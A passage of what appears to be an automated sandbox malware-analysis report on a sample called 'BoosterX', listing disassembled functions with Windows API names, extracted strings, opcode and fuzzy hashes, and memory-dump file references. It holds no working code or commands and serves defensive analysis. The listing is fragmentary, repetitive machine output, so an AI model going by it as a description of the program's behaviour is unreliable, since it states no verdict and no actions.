                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID:
                                                    • API String ID: 1611563598-0
                                                    • Opcode ID: 9c840309d013360c449daa427f1fc183ac61f7933642795e3a693a1311e8ce7d
                                                    • Instruction ID: 4e180463d96cf79bc8a897bb15109b65e53715878de9f9a2f9514f898bd4283d
                                                    • Opcode Fuzzy Hash: 9c840309d013360c449daa427f1fc183ac61f7933642795e3a693a1311e8ce7d
                                                    • Instruction Fuzzy Hash: 44C04C21F15503D1DB089F26C8CA51813A5BB94B06BA58035D54DC5360DF2DD5EE9745
                                                    Function 00007FF6C038F984 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: AllocHeap
                                                    • String ID:
                                                    • API String ID: 4292702814-0
                                                    • Opcode ID: 65d65be094b720022a4c613e05cd8daa3805a7558d9a012189656855d83645cd
                                                    • Instruction ID: 4290c4247e1b15a3981b55768637fd40fe8a56e3a5dd04b73461906c1c67db3d
                                                    • Opcode Fuzzy Hash: 65d65be094b720022a4c613e05cd8daa3805a7558d9a012189656855d83645cd
                                                    • Instruction Fuzzy Hash: EBF09A50B1961779FE956F669D127B852806F98B86F4C46B3CDCEC63C2EF2CF8808210
                                                    Function 00007FF6C0362090 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 88ac200104c8a376347706866ba6eb900ce7ebb2d802d1386c93ce6497709a49
                                                    • Instruction ID: fd280f9a95da0a00c9b39277aad5e6c7948d5b02b6576c7eac51209d80f0282e
                                                    • Opcode Fuzzy Hash: 88ac200104c8a376347706866ba6eb900ce7ebb2d802d1386c93ce6497709a49
                                                    • Instruction Fuzzy Hash: 71F08122A08A43A5FB248F20E4402B92660EB15B7AF495335D7BCC56D4DF28D895C714
                                                    Function 00007FF6C038D8CC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: AllocHeap
                                                    • String ID:
                                                    • API String ID: 4292702814-0
                                                    • Opcode ID: 2826fc88380e59435e692d83d50ce6089ce9b14572d7d031222529168f4ecb4e
                                                    • Instruction ID: 7dd15e9165dc739f1ce263ae0d03c3a9b6f436b5c8ad80619701a4fc8400bc49
                                                    • Opcode Fuzzy Hash: 2826fc88380e59435e692d83d50ce6089ce9b14572d7d031222529168f4ecb4e
                                                    • Instruction Fuzzy Hash: 20F0F810B19247A5FF566FB258112B553905F947A2F4847B3DDEEC63C1EF2CA9808610

                                                    Non-executed Functions

                                                    Function 00007FF6C035C300 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 754fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                    • API String ID: 2659423929-3508440684
                                                    • Opcode ID: 578450afe0f1bc0c690d6bb4006d71e7b96940e0835be98eaf36633f6753adaf
                                                    • Instruction ID: e6bd993deed2f8e0498585ae4572af0577946b7620a25861b8b0f0d777c0bfc0
                                                    • Opcode Fuzzy Hash: 578450afe0f1bc0c690d6bb4006d71e7b96940e0835be98eaf36633f6753adaf
                                                    • Instruction Fuzzy Hash: 6F628E66F18643A9FB009F74D4492AD3361AB857A9F504232DAADD7BEADF3CD185C300
                                                    Function 00007FF6C0361A00 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 375fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                    • String ID: rtmp
                                                    • API String ID: 3587137053-870060881
                                                    • Opcode ID: 5804a3a641a418029af90becdda62572abb54b7e623b8138e0a4758647245305
                                                    • Instruction ID: 3fc0ba95deceef9a2a4359a1b1032f120d31030f5662d923103defd46c0d0a2e
                                                    • Opcode Fuzzy Hash: 5804a3a641a418029af90becdda62572abb54b7e623b8138e0a4758647245305
                                                    • Instruction Fuzzy Hash: 09F1CC22B08A83A1EA10DF65D8841BD6761FB85B85F541632EE8DC7BA9DF3CE584C740
                                                    Function 00007FF6C0365B20 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 1693479884-0
                                                    • Opcode ID: 43a43ba386c24045c0db5af6cf1db9acff8f38ee05368a60e4c32fec91fd7930
                                                    • Instruction ID: 13cebc64ab1f71dae40a58e87847cdb0554b9b8b482583c769a226fd8d0f8021
                                                    • Opcode Fuzzy Hash: 43a43ba386c24045c0db5af6cf1db9acff8f38ee05368a60e4c32fec91fd7930
                                                    • Instruction Fuzzy Hash: 39A1B062F15B5395FE048F7988485BD2321BB85BA6F145232DEADD7BC9DF3CE1818210
                                                    Function 00007FF6C03830F0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 3140674995-0
                                                    • Opcode ID: 0807455d0555d650f040b04fa66349818bf1af33e15178971619a7c0969c3fb0
                                                    • Instruction ID: 03a0ac84de7c1fa33d3469c66c4c78ab5dc49dad1ba26fff62b1a95bb874b943
                                                    • Opcode Fuzzy Hash: 0807455d0555d650f040b04fa66349818bf1af33e15178971619a7c0969c3fb0
                                                    • Instruction Fuzzy Hash: D8315076609B82A9EB609F60E8903ED7360FB84B45F44453ADA8EC7B98DF38D548C710
                                                    Function 00007FF6C0387658 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 1239891234-0
                                                    • Opcode ID: ad4a7a01f5f8e7c35986f1c3a3571837895acf53bea511e166d2dcba98ee745e
                                                    • Instruction ID: e810bf304580ba86126e3b05cfc6f63ad8ddbe3d5118f25a6ed7cad655bbabd4
                                                    • Opcode Fuzzy Hash: ad4a7a01f5f8e7c35986f1c3a3571837895acf53bea511e166d2dcba98ee745e
                                                    • Instruction Fuzzy Hash: CC316236608B82A6DB60CF25E8402AE73A0FB84B55F540236EE9DC7B59DF3CD545CB00
                                                    Function 00007FF6C0351AA4 Relevance: 6.3, APIs: 4, Instructions: 285COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: db7996cf17faa13ca880b81eaf1002c09d293d8692a5d372692e043dc9a0b405
                                                    • Instruction ID: b50a826c2c95551f194edec8908937c30c8dde8a8d39d8efbab4b413fabdab54
                                                    • Opcode Fuzzy Hash: db7996cf17faa13ca880b81eaf1002c09d293d8692a5d372692e043dc9a0b405
                                                    • Instruction Fuzzy Hash: 7DB1BD26B14A83A6EB109F65D8452AD3361FB85B99F405232EE8DC7BE9DF3CD540C300
                                                    Function 00007FF6C038FA14 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C038FA44
                                                      • Part of subcall function 00007FF6C03878B4: GetCurrentProcess.KERNEL32(00007FF6C0390C4D), ref: 00007FF6C03878E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CurrentProcess_invalid_parameter_noinfo
                                                    • String ID: *?$.
                                                    • API String ID: 2518042432-3972193922
                                                    • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                    • Instruction ID: f706cd35fd800242ab933965261bac2ecc1282917c92775390f1f815a720a42c
                                                    • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                                    • Instruction Fuzzy Hash: 1651E362B14AA799EF15DFA298100B867A4FB48BD9B544233DE9DC7B89DF3CD0428300
                                                    Function 00007FF6C037A24C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: FormatInfoLocaleNumber
                                                    • String ID:
                                                    • API String ID: 2169056816-0
                                                    • Opcode ID: d9124697dc7a8d84d5d498c11f979aef44ae65fa130e56fd134fc764616be2af
                                                    • Instruction ID: a128b04f1b6e6915e7a78f33bd63348d1252cd0a5596b3329714a939ba5876b7
                                                    • Opcode Fuzzy Hash: d9124697dc7a8d84d5d498c11f979aef44ae65fa130e56fd134fc764616be2af
                                                    • Instruction Fuzzy Hash: 44114F32A18B82A6E7618F61E4107E97360FF88B85F844135DA8DC3755DF3CD245CB44
                                                    Function 00007FF6C0365164 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Version
                                                    • String ID:
                                                    • API String ID: 1889659487-0
                                                    • Opcode ID: 28938a17eae63f527378ec6d8089add22f73b828584f204ae18651ef0e591bdf
                                                    • Instruction ID: a2486be5aca58c0c61c419dc6b93bf6c6a1466429eaf7282509b168bbceef054
                                                    • Opcode Fuzzy Hash: 28938a17eae63f527378ec6d8089add22f73b828584f204ae18651ef0e591bdf
                                                    • Instruction Fuzzy Hash: 4901E575A08A43ABFA64CF10E85177A33A1BB99316F600235D69DC67A5DF3CE5058E04
                                                    Function 00007FF6C035D7E0 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                    • API String ID: 3668304517-727060406
                                                    • Opcode ID: d3aa207b925aaa45bbd348e2706146858f096aab5cdaf612773ab52f2a051993
                                                    • Instruction ID: 56a7973d47be8ac66e5fe5eb1e62485f4892b9158121b9b179435dcbb22b439b
                                                    • Opcode Fuzzy Hash: d3aa207b925aaa45bbd348e2706146858f096aab5cdaf612773ab52f2a051993
                                                    • Instruction Fuzzy Hash: A241D576B05B02A9EB118F64E4843E933A9EB48799F500636DE8CD3B69EF38D155C344
                                                    Function 00007FF6C0382990 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                    • API String ID: 2565136772-3242537097
                                                    • Opcode ID: fdee9745a353db95c9b4b27806cffd46c0390e42e013dce2f99bb91082c79cfb
                                                    • Instruction ID: 97c25fecaedbe174f6d8ff3be46f50d3497c1227ead9436b531e2453fa87bfab
                                                    • Opcode Fuzzy Hash: fdee9745a353db95c9b4b27806cffd46c0390e42e013dce2f99bb91082c79cfb
                                                    • Instruction Fuzzy Hash: 52211D64E19A03B1FE28DF60E99517523A0AF88B86F440177CE8EC27A1DF3CE546C704
                                                    Function 00007FF6C03669CC Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 444COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                    • String ID: DXGIDebug.dll$UNC$\\?\
                                                    • API String ID: 4097890229-4048004291
                                                    • Opcode ID: bd3678a704b3fbe9d4da05dd4776dd800f3f2c11ab756146d0a2ea33823be3c5
                                                    • Instruction ID: 6fd09d31254888a6d2f05fa34331f795055680783a567bce423790d55e0e6859
                                                    • Opcode Fuzzy Hash: bd3678a704b3fbe9d4da05dd4776dd800f3f2c11ab756146d0a2ea33823be3c5
                                                    • Instruction Fuzzy Hash: 3C129B22B08A43A4EA109F65E4481AD6376FB81BD9F504236DB9DC7BE9DF3CD549C340
                                                    Function 00007FF6C037A3C0 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 257COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
